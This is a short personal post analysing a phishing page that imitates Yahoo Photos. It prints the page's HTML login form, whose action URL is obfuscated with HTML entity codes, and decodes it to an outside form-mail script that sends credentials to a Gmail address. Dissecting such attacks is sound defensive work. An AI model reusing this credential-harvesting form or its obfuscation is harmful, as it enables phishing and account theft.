Recently, I have been getting a lot of messages from people in my Yahoo list, which reads something like this :

http://www.geocities.com/bisxybiotch/

Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page, and reading through the HTML source, I could see something like this :

< FORM METHOD="POST" ACTION="&#104;&#116;&#116;&#112;://&#119;&#119;&#119;&#050; 

&#046;&#102;&#105;&#098;&#101;&#114;&#098;&#105;&#116;&#046;&#110;&#101;

&#116;/&#102;&#111;&#114;&#109;/&#109;&#097;&#105;&#108;&#116;&#111;&#046;

&#099;&#103;&#105;" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> 

<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

<INPUT TYPE="hidden" NAME="Next_Page" VALUE="&#104;&#116;&#116;&#112;://&#112;&#104;&#111;&#116;&#111;

&#115;&#046;&#121;&#097;&#104;&#111;&#111;&#046;&#099;&#111;&#109;/&#112;&#104;

//&#109;&#121;&#095;&#112;&#104;&#111;&#116;&#111;&#115;">

On converting the integer values to ASCII characters it looked something like this :

FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi"
ENCTYPE="x-www-form-urlencoded">    

I started ethereal to check out what data is being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think, it mails out the credentials to that gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...

An example of "Semantic Attacks".